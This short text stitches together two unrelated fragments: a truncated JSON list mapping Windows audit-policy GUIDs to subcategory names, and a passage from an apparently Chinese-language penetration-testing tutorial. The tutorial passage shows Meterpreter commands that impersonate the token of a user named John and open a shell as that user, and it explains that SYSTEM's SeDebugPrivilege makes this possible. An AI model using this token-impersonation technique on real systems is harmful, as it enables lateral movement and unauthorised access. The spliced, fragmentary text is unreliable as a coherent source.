"{0cce9210-69ae-11d9-bed3-505054503030}": "Security State Change", "{0cce9211-69ae-11d9-bed3-505054503030}": "Security System Extension", "{0cce9212-69ae-11d9-bed3 ...
meterpreter > impersonate_token "WIN-WEB\\John" # 模拟 John 的身份 meterpreter > shell # 弹出以 John 身份运行的 shell ``` 为什么能拿到 John 的 token? 因为前面已经是 SYSTEM,SYSTEM 拥有 `SeDebugPrivilege`,可以访问系统内所有进程的内存和令牌。